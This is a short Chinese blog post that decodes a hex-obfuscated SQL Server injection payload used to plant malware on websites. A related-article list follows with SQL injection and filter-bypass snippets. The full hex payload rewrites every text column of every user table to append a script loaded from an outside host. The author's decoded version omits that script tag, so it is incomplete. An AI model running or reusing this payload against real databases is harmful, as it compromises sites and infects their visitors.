mysql 16 进制 注入_16进制 SQL注入

最新推荐文章于 2023-05-28 14:57:06 发布
最新推荐文章于 2023-05-28 14:57:06 发布
阅读量956 收藏
点赞数
文章标签: mysql 16 进制 注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_30093045/article/details/113455419
版权

dEcLaRe @s vArChAr(8000) sEt @s=0x4465636c617265204054205661726368617228323535292c4043205661726368617228323535290d0a4465636c617265205461626c655f437572736f7220437572736f7220466f722053656c65637420412e4e616d652c422e4e616d652046726f6d205379736f626a6563747320412c537973636f6c756d6e73204220576865726520412e49643d422e496420416e6420412e58747970653d27752720416e642028422e58747970653d3939204f7220422e58747970653d3335204f7220422e58747970653d323331204f7220422e58747970653d31363729204f70656e205461626c655f437572736f72204665746368204e6578742046726f6d20205461626c655f437572736f7220496e746f2040542c4043205768696c6528404046657463685f5374617475733d302920426567696e20457865632827757064617465205b272b40542b275d20536574205b272b40432b275d3d527472696d28436f6e7665727428566172636861722838303030292c5b272b40432b275d29292b27273c736372697074207372633d687474703a2f2f386638656c336c2e636e2f302e6a733e3c2f7363726970743e272727294665746368204e6578742046726f6d20205461626c655f437572736f7220496e746f2040542c404320456e6420436c6f7365205461626c655f437572736f72204465616c6c6f63617465205461626c655f437572736f72 eXeC(@s);

这个就是互联网泛滥的挂马专用代码,专门给过滤法的程序服务的。

把16进制翻译过来

DECLARE @T VARCHAR(255),@C VARCHAR(255)

DECLARE Table_Cursor CURSOR FOR

SELECT a.name,b.name FROM sysobjects a,syscolumns b

WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)

OPEN Table_Cursor

FETCH NEXT FROM Table_Cursor INTO @T,@C

WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''''')

FETCH NEXT FROM Table_Cursor INTO @T,@C END

CLOSE Table_Cursor DEALLOCATE Table_Cursor

看来原来的代码给16进制掩护得多少好。

俗人子逸
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL注入_16进制转换工具
09-10
SQL注入_16进制转换工具学习用,勿用其它商业用途啊!
16进制的SQL 注入
zhuyx808的专栏
12-11 1268
通过post,get,cookies方式注入注入内容如下: DeCLaRE @S NvArCHaR(4000);SeT @S=CaSt(0x4400650063006C0061007200650020004000540020005600610072006300680061007200280032 003500350029002C00400043002000560061007200630068...
mysql 16进制 注入,将十六进制值插入到mysql
weixin_29118723的博客
01-19 608
Can there any way to insert a hex value into MYSQL?I also want to be able to retreive it in hex form.For example, something like:INSERT INTO table ( hexTag )VALUES ( HEX(0x41) );And if I do this, I wa...
16进制 SQL注入
05-26 1109
dEcLaRe @s vArChAr(8000) sEt @s=0x4465636c617265204054205661726368617228323535292c4043205661726368617228323535290d0a4465636c617265205461626c655f437572736f7220437572736f7220466f722053656c65637420412e4e
mysql注入ctf_CTF SQL注入
weixin_42510026的博客
01-28 658
一、宽字节注入原理:GBK编码、URL转码利用mysql的一个特性,mysql在使用GBK编码的时候,会认为两个字符是一个汉字(前一个ASCII码要大于128,才到汉字的范围)例如:' -> ' -> %5C%27%df' -> %df' -> %df%5C%27sql字符集特性MYSQL 中 utf8_unicode_ci 和 utf8_general...
mysql 登录框注入_CTF| SQL注入之login界面类
weixin_34609222的博客
01-19 2544
SQL注入是CTF的WEB方向必不可少的一种题型,斗哥最近也做了一些在线题目,其中最常见的题目就是给出一个登录界面,让我们绕过限制登录或者一步步注入数据。万能密码—very easy题目入口:http://lab1.xseclab.com/sqli2_3265b4852c13383560327d1c31550b60/index.php题目来源:hacking lab inject 01~源代码有提...
concat mysql sql注入_Web安全测试学习笔记-SQL注入-利用concat和updatexml函数
weixin_42097668的博客
12-29 389
mysql数据库中有两个函数:concat和updatexml,在sql注入时经常组合使用,本文通过学习concat和updatexml函数的使用方法,结合实例来理解这种sql注入方式的原理。concat函数是mysql的字符串连接函数,定义如下: 先来验证下concat函数的功能:select concat('m','y','s','q','l')验证结果:如定义所示,concat将字符串连接起...
mysql注入ctf_CTF考点总结-sql注入
weixin_36488760的博客
01-28 1100
整理下sql相关知识,查漏补缺(长期更新)常用语句及知识information_schema包含了大量有用的信息,例如下图mysql.user下有所有的用户信息,其中authentication_string为用户密码的hash,如果可以使用可以修改这个值,那么就可以修改任意用户的密码当前用户:select user()数据库版本:select version() , select @@versi...
mysql注入获取数据表_SQL注入之获取指定数据库数据Mysql(基础篇)
weixin_39750190的博客
01-25 2990
前言> 我们知道,在我们进行某网站sql注入的时候,我们有时候只可以进行简单的 union select user(),version(),@@basedir() #> 这类简单的查询,想要获得管理员用户密码或者敏感信息的时候就很难搞,因为我们不知道他的数据库表的名字以及字段名字,这篇文章就是介绍一下如果利用Mysql数据库自带的information_schema数据库获取其他数据库...
SQL注入16进制转换工具
10-22
一款很好用的SQL注入16进制转换工具,大家可以试用一下
SQL注入学习帮助小工具 16进制转换工具
04-23
SQL注入学习帮助小工具 16进制转换工具SQL注入学习帮助小工具 16进制转换工具SQL注入学习帮助小工具 16进制转换工具
16进制转换工具 SQL注入学习小工具 学习
03-04
16进制转换工具,非常 好。学习用的。SQL注入学习的时候转换URL等等呀
mysql 16进制 注入_将十六进制值插入到mysql
weixin_36416418的博客
01-19 601
Can there any way to insert a hex value into MYSQL?I also want to be able to retreive it in hex form.For example, something like:INSERT INTO table ( hexTag )VALUES ( HEX(0x41) );And if I do this, I wa...
【漏洞扫描】——15、Goby漏洞扫描工具
Fly_鹏程万里
03-01 872
MYSQL注入流程(1)判断是否存在SQL注入 ' and 1=1 and 1=2(2)爆字段 order by 猜测的字段数(3)匹配字段 and 1=1 union select 1,2,3,......,n(4)获取显示字段and 1=2 union select 1,2,3,4......n(5)利用内置函数爆数据库信息 version() ...
iwebsec靶场 SQL注入漏洞通关笔记11-16进制编码绕过
mooyuan的博客
12-01 2519
打开靶场,url为id=1如下所示SQL注入主要分析几个内容(1)闭合方式是什么?iwebsec的第11关关卡为数字型,无闭合(2)注入类别是什么?这部分是普通的报错型注入(3)是否过滤了关键字?很明显通过源码,iwebsec的11关增加了addslashes和get_magic_quotes_gpc函数,可以使用16进制编码的方式进行绕过。
mysql 16进制 绕过_sql注入绕过
weixin_39783633的博客
02-01 880
1.空格过滤绕过可用/**/制表符(url编码为%09)换行符(%0a)括号反引号 代替空格mysql数据库有一个特性。在条件语句中,在 where id =1 后面加上 “=1”,成为where id =1 =1 ,就是对前面所有结果&1,查询的结果与原来一样。where id =1 =0 就是对于前面所有结果&0 ,查询的结果为除去原有查询结果的其他数据,输出的是除去1以外的...
sql注入方式
最新发布
m0_69801663的博客
05-28 121
sql注入方式
limit 后注入_SQL注入中的WAF绕过技术
weixin_39932838的博客
11-26 202
1.大小写绕过这个大家都很熟悉,对于一些太垃圾的WAF效果显著,比如拦截了union,那就使用Union UnIoN等等绕过。2.简单编码绕过比如WAF检测关键字,那么我们让他检测不到就可以了。比如检测union,那么我们就用%55也就是U的16进制编码来代替U,union写成 %55nION,结合大小写也可以绕过一些WAF,你可以随意替换一个或几个都可以。也还有大家在Mysql注入中比如表名或是...
mysqlSQL注入:CTF Web安全探索关键信息库
本文档主要探讨了MySQLSQL注入在Web安全和CTF(Capture The Flag,网络安全竞赛)中的重要性,结合了对系统库的深入解析以及常用指令的操作。首先,我们来了解一下MySQL的核心组成部分和它们的功能: 1. **...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值